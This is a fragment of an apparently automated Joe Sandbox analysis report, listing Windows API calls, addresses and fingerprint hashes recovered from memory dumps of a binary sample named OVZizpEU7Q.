                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateHandle$FilePipe
                                                                                        • String ID: nul
                                                                                        • API String ID: 4209266947-2873401336
                                                                                        • Opcode ID: f98635b68cd5b0ab1880de70f3850fd061f65506a9295ae7d453fc561602cffb
                                                                                        • Instruction ID: cca2de9678abd998f0cd8c5114a45f7ff5fc269ace22cdb61a343b4aec1dc2fa
                                                                                        • Opcode Fuzzy Hash: f98635b68cd5b0ab1880de70f3850fd061f65506a9295ae7d453fc561602cffb
                                                                                        • Instruction Fuzzy Hash: 8B219274600209ABDB209F29DC05A9A77F8EF44720F214A2FFCA0D73D0EB759955CB5A
                                                                                        APIs
                                                                                        • GetStdHandle.KERNEL32(000000F6), ref: 00466E89
                                                                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00466EBB
                                                                                        • GetStdHandle.KERNEL32(000000F6), ref: 00466ECC
                                                                                        • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00466F06
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateHandle$FilePipe
                                                                                        • String ID: nul
                                                                                        • API String ID: 4209266947-2873401336
                                                                                        • Opcode ID: f710eb54d58d972596414a75e1bad7db44e4d7afab8e48cef3b5ff9c2d25cc6d
                                                                                        • Instruction ID: 3a9fffd2e99ff55030e4788a991c608e9c08d8bb738c80722c17144d2858802a
                                                                                        • Opcode Fuzzy Hash: f710eb54d58d972596414a75e1bad7db44e4d7afab8e48cef3b5ff9c2d25cc6d
                                                                                        • Instruction Fuzzy Hash: 7B21C7795003059BDB209F69CC04A9B77A8EF44724F210B1EFCA0D33D0E7759851C75A
                                                                                        APIs
                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 0046AC54
                                                                                        • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0046ACA8
                                                                                        • __swprintf.LIBCMT ref: 0046ACC1
                                                                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000,0048F910), ref: 0046ACFF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorMode$InformationVolume__swprintf
                                                                                        • String ID: %lu
                                                                                        • API String ID: 3164766367-685833217
                                                                                        • Opcode ID: 1226eaab5c3aec93efd893ba7ce645b68cb4b14e47f6f225cd052cc4731cbfea
                                                                                        • Instruction ID: 026ba00fef41ead7d753cb67677e2cef5533d5e87c35db631ff5a0b10e4673a5
                                                                                        • Opcode Fuzzy Hash: 1226eaab5c3aec93efd893ba7ce645b68cb4b14e47f6f225cd052cc4731cbfea
                                                                                        • Instruction Fuzzy Hash: FE217470600109AFCB10EF65C945DAE77B8EF49318B10447EF905AB252DA35EE55CB25
                                                                                        APIs
                                                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0045FCED,?,00460D40,?,00008000), ref: 0046115F
                                                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,0045FCED,?,00460D40,?,00008000), ref: 00461184
                                                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0045FCED,?,00460D40,?,00008000), ref: 0046118E
                                                                                        • Sleep.KERNEL32(?,?,?,?,?,?,?,0045FCED,?,00460D40,?,00008000), ref: 004611C1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: CounterPerformanceQuerySleep
                                                                                        • String ID: @F
                                                                                        • API String ID: 2875609808-2781531706
                                                                                        • Opcode ID: fb156e6c77600c7f304348c8d1eac85c626a95be7b30d4d71b6c442a0f0d2560
                                                                                        • Instruction ID: bb6757969e877831e55d7075b4886ee1e071d58b2ed1133263d880316bc49dff
                                                                                        • Opcode Fuzzy Hash: fb156e6c77600c7f304348c8d1eac85c626a95be7b30d4d71b6c442a0f0d2560
                                                                                        • Instruction Fuzzy Hash: B5113071D0051DD7CF00DFA5D9486EEBB78FF0E711F04446ADA41B2250DB789954CB9A
                                                                                        APIs
                                                                                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047EC07
                                                                                        • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047EC37
                                                                                        • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0047ED6A
                                                                                        • CloseHandle.KERNEL32(?), ref: 0047EDEB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                        • String ID:
                                                                                        • API String ID: 2364364464-0
                                                                                        • Opcode ID: 0682de77952afe081ab9211739b9fa55dc0894d1ffd7185653a5878fd6647099
                                                                                        • Instruction ID: fffec5fe55f17e3d6af6322d033c5a61601868e7b6c72126a0bd4eac84abd099
                                                                                        • Opcode Fuzzy Hash: 0682de77952afe081ab9211739b9fa55dc0894d1ffd7185653a5878fd6647099
                                                                                        • Instruction Fuzzy Hash: F38191B16007009FD720EF29C846F6AB7E5AF48714F04C96EF999AB3D2D674AC44CB49
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                                        • String ID:
                                                                                        • API String ID: 1559183368-0
                                                                                        APIs
                                                                                          • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                          • Part of subcall function 00480E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0047FDAD,?,?), ref: 00480E31
                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004800FD
                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0048013C
                                                                                        • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00480183
                                                                                        • RegCloseKey.ADVAPI32(?,?), ref: 004801AF
                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 004801BC
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                                        • String ID:
                                                                                        • API String ID: 3440857362-0
                                                                                        APIs
                                                                                          • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                                                          • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                                                        • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0047D927
                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 0047D9AA
                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 0047D9C6
                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 0047DA07
                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0047DA21
                                                                                          • Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00467896,?,?,00000000), ref: 00405A2C
                                                                                          • Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00467896,?,?,00000000,?,?), ref: 00405A50
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                                        • String ID:
                                                                                        • API String ID: 327935632-0
                                                                                        APIs
                                                                                        • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0046E61F
                                                                                        • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0046E648
                                                                                        • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0046E687
                                                                                          • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                                                          • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                                                        • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0046E6AC
                                                                                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0046E6B4
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                        • String ID:
                                                                                        • API String ID: 1389676194-0
                                                                                        APIs
                                                                                        • GetCursorPos.USER32(?), ref: 00402357
                                                                                        • ScreenToClient.USER32(004C57B0,?), ref: 00402374
                                                                                        • GetAsyncKeyState.USER32(00000001), ref: 00402399
                                                                                        • GetAsyncKeyState.USER32(00000002), ref: 004023A7
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: AsyncState$ClientCursorScreen
                                                                                        • String ID:
                                                                                        • API String ID: 4210589936-0
                                                                                        APIs
                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004563E7
                                                                                        • TranslateAcceleratorW.USER32(?,?,?), ref: 00456433
                                                                                        • TranslateMessage.USER32(?), ref: 0045645C
                                                                                        • DispatchMessageW.USER32(?), ref: 00456466
                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00456475
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                                                        • String ID:
                                                                                        • API String ID: 2108273632-0
                                                                                        APIs
                                                                                        • GetWindowRect.USER32(?,?), ref: 00458A30
                                                                                        • PostMessageW.USER32(?,00000201,00000001), ref: 00458ADA
                                                                                        • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00458AE2
                                                                                        • PostMessageW.USER32(?,00000202,00000000), ref: 00458AF0
                                                                                        • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00458AF8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: MessagePostSleep$RectWindow
                                                                                        • String ID:
                                                                                        • API String ID: 3382505437-0
                                                                                        APIs
                                                                                        • IsWindowVisible.USER32(?), ref: 0045B204
                                                                                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0045B221
                                                                                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0045B259
                                                                                        • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0045B27F
                                                                                        • _wcsstr.LIBCMT ref: 0045B289
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                        • String ID:
                                                                                        • API String ID: 3902887630-0
                                                                                        • Opcode ID: 899d60c600cb03defd51949f250b9708d46bd725799c5b521baeadb23fec0c53
                                                                                        • Instruction ID: 2c7352b259513f6215f8baf2ea9b1e154aa1926be373c141b5dda8785e83a564
                                                                                        • Opcode Fuzzy Hash: 899d60c600cb03defd51949f250b9708d46bd725799c5b521baeadb23fec0c53
                                                                                        • Instruction Fuzzy Hash: DF2103312042007BEB155B75AC09A7F7B98DB49711F10417EFC04DA262EF699C4597A8
                                                                                        APIs
                                                                                          • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0048B192
                                                                                        • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0048B1B7
                                                                                        • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0048B1CF
                                                                                        • GetSystemMetrics.USER32(00000004), ref: 0048B1F8
                                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00470E90,00000000), ref: 0048B216
                                                                                        Similarity
                                                                                        • API ID: Window$Long$MetricsSystem
                                                                                        • String ID:
                                                                                        • API String ID: 2294984445-0
                                                                                        • Opcode ID: 4e73adee6138af7d1bf797c64f9d3d784d2b70968eee1b9af5d753c6da9745a2
                                                                                        • Instruction ID: a9241cd50f58f28df48e309b6b0d701528321bfcfd0e0dab973ca591f656860e
                                                                                        • Opcode Fuzzy Hash: 4e73adee6138af7d1bf797c64f9d3d784d2b70968eee1b9af5d753c6da9745a2
                                                                                        • Instruction Fuzzy Hash: D6218071910651AFCB10AF389C18A6F3BA4FB15361F144F3ABD32D72E0E73498618B98
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00459320
                                                                                          • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00459352
                                                                                        • __itow.LIBCMT ref: 0045936A
                                                                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00459392
                                                                                        • __itow.LIBCMT ref: 004593A3
                                                                                        Similarity
                                                                                        • API ID: MessageSend$__itow$_memmove
                                                                                        • String ID:
                                                                                        • API String ID: 2983881199-0
                                                                                        • Opcode ID: 84fe632702548fb1505fa491271f0483b598e009c5f2d7716c087cfb082072c1
                                                                                        • Instruction ID: 968ba8743040f36d453ad30986a6980fa4fc6e9bba4f502b0ab074d445a6e810
                                                                                        • Opcode Fuzzy Hash: 84fe632702548fb1505fa491271f0483b598e009c5f2d7716c087cfb082072c1
                                                                                        • Instruction Fuzzy Hash: 0821F831B00204FBDB10AA618C85EAE3BA8EF4C715F14403AFD04E72C2D6B89D49979A
                                                                                        APIs
                                                                                        • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0040134D
                                                                                        • SelectObject.GDI32(?,00000000), ref: 0040135C
                                                                                        • BeginPath.GDI32(?), ref: 00401373
                                                                                        • SelectObject.GDI32(?,00000000), ref: 0040139C
                                                                                        Similarity
                                                                                        • API ID: ObjectSelect$BeginCreatePath
                                                                                        • String ID:
                                                                                        • API String ID: 3225163088-0
                                                                                        • Opcode ID: 6eee13c9652aa66c46a5bd740bf4bc56e64492aa972ec1549dd75ab418036029
                                                                                        • Instruction ID: 345c33b4cc72e80acb91194012c3a0486190d93d7afc841094e42ad70741f55b
                                                                                        • Opcode Fuzzy Hash: 6eee13c9652aa66c46a5bd740bf4bc56e64492aa972ec1549dd75ab418036029
                                                                                        • Instruction Fuzzy Hash: 74215130800604DFEB10AF15DC04B6E7BA8FB00351F54463BF810A61F0D778A8A5DFA9
                                                                                        APIs
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00464ABA
                                                                                        • __beginthreadex.LIBCMT ref: 00464AD8
                                                                                        • MessageBoxW.USER32(?,?,?,?), ref: 00464AED
                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00464B03
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00464B0A
                                                                                        Similarity
                                                                                        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                                                        • String ID:
                                                                                        • API String ID: 3824534824-0
                                                                                        • Opcode ID: 6202b558f3b2a9591e93c05a74b6ac6320d8986f7eb6685660a047ad8363ccb0
                                                                                        • Instruction ID: dad7fb5640a7fc086676ad258fed45b246edcd9838203791acb142923f9e7505
                                                                                        • Opcode Fuzzy Hash: 6202b558f3b2a9591e93c05a74b6ac6320d8986f7eb6685660a047ad8363ccb0
                                                                                        • Instruction Fuzzy Hash: AC110876904214BBCB009FA8EC08E9F7FACEB85320F14427AF815D3350E679DD448BA9
                                                                                        APIs
                                                                                        • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0045821E
                                                                                        • GetLastError.KERNEL32(?,00457CE2,?,?,?), ref: 00458228
                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00457CE2,?,?,?), ref: 00458237
                                                                                        • HeapAlloc.KERNEL32(00000000,?,00457CE2,?,?,?), ref: 0045823E
                                                                                        • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00458255
                                                                                        Similarity
                                                                                        • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                        • String ID:
                                                                                        • API String ID: 842720411-0
                                                                                        • Opcode ID: cfd5187f71e7f5cd8bdbe136946f039270b76956d2ef1bbe7b4a41513b9fedde
                                                                                        • Instruction ID: ea2086197a74160409fd2b37e3cc6aadebf9925ef2750944b4d42ea2a50fea98
                                                                                        • Opcode Fuzzy Hash: cfd5187f71e7f5cd8bdbe136946f039270b76956d2ef1bbe7b4a41513b9fedde
                                                                                        • Instruction Fuzzy Hash: 5F012471200604AF9B204FA6DC88D6B7FACEF8A755B50097EF809D2220DE318C18CA64
                                                                                        APIs
                                                                                        • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?,?,00457455), ref: 00457127
                                                                                        • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?), ref: 00457142
                                                                                        • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?), ref: 00457150
                                                                                        • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?), ref: 00457160
                                                                                        • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?), ref: 0045716C
                                                                                        Similarity
                                                                                        • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                        • String ID:
                                                                                        • API String ID: 3897988419-0
                                                                                        • Opcode ID: 053515c948ca66986ad112422e3531eaba7e5432baa58b7069d320ef88250593
                                                                                        • Instruction ID: e33d562c89cd7b32e1c2ea0ad0b2255dbd3c00d864d4e8b233389f959c6fe991
                                                                                        • Opcode Fuzzy Hash: 053515c948ca66986ad112422e3531eaba7e5432baa58b7069d320ef88250593
                                                                                        • Instruction Fuzzy Hash: 9F01DF72600604BBCB105F68EC44BAE7BADEF44792F100079FD04D2321DB35DD088BA4
                                                                                        APIs
                                                                                        • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00465260
                                                                                        • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0046526E
                                                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00465276
                                                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00465280
                                                                                        • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004652BC
                                                                                        Similarity
                                                                                        • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                        • String ID:
                                                                                        • API String ID: 2833360925-0
                                                                                        • Opcode ID: f570a565f6e5a323919ec457eb30d6746b1d20e306601747cbf76f1b2f538e79
                                                                                        • Instruction ID: 4ceb344e541e682f07f906f107c4893f4acd0a9012da7968cf5d6b0cf31b4d70
                                                                                        • Opcode Fuzzy Hash: f570a565f6e5a323919ec457eb30d6746b1d20e306601747cbf76f1b2f538e79
                                                                                        • Instruction Fuzzy Hash: 89015B71D01A19DBCF00DFE4DC585EEBB78FB09711F4004AAE941F2240DB3459548BAA
                                                                                        APIs
                                                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00458121
                                                                                        • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0045812B
                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0045813A
                                                                                        • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00458141
                                                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00458157
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                        • String ID:
                                                                                        • API String ID: 44706859-0
                                                                                        • Opcode ID: 9a4f6c5eb7810c0e88419f6a8d5d9273e391a222e84c7421f05042c8608bd2e6
                                                                                        • Instruction ID: c07733b115f7f4265118d5d6f8c893d5168d9180ec19ac620c451b64c6eb697f
                                                                                        • Opcode Fuzzy Hash: 9a4f6c5eb7810c0e88419f6a8d5d9273e391a222e84c7421f05042c8608bd2e6
                                                                                        • Instruction Fuzzy Hash: 71F0AF70200704AFEB110FA5EC88E6B3BACEF4A755B10043EF945D2250DF649C09DB64
                                                                                        APIs
                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 0045C1F7
                                                                                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 0045C20E
                                                                                        • MessageBeep.USER32(00000000), ref: 0045C226
                                                                                        • KillTimer.USER32(?,0000040A), ref: 0045C242
                                                                                        • EndDialog.USER32(?,00000001), ref: 0045C25C
                                                                                        Similarity
                                                                                        • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                        • String ID:
                                                                                        • API String ID: 3741023627-0
                                                                                        • Opcode ID: 4cc83a5054ee70337c3131b30a14a5b24bd9acd8f200e045765572ac389ab5c6
                                                                                        • Instruction ID: 1cbdf9da880a683b58ffeaf16326a4f2222d3a7c74a558aa9ab436c5b6b9af77
                                                                                        • Opcode Fuzzy Hash: 4cc83a5054ee70337c3131b30a14a5b24bd9acd8f200e045765572ac389ab5c6
                                                                                        • Instruction Fuzzy Hash: DF0167309047049BEB205B54DD8EB9A7778BB00706F000ABEB942A15E1DBF8699DDB59
                                                                                        APIs
                                                                                        • EndPath.GDI32(?), ref: 004013BF
                                                                                        • StrokeAndFillPath.GDI32(?,?,0043B888,00000000,?), ref: 004013DB
                                                                                        • SelectObject.GDI32(?,00000000), ref: 004013EE
                                                                                        • DeleteObject.GDI32 ref: 00401401
                                                                                        • StrokePath.GDI32(?), ref: 0040141C
                                                                                        Similarity
                                                                                        • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                        • String ID:
                                                                                        • API String ID: 2625713937-0
                                                                                        • Opcode ID: e3422339a15b844a04c007a3cb2e97a240e6e454912aa1f685e9751c28b57a09
                                                                                        • Instruction ID: 52848d70ea624aaff4fbf1a8dc35ad1b05fe5f58837c3e038025b123c59b5ab6
                                                                                        • Opcode Fuzzy Hash: e3422339a15b844a04c007a3cb2e97a240e6e454912aa1f685e9751c28b57a09
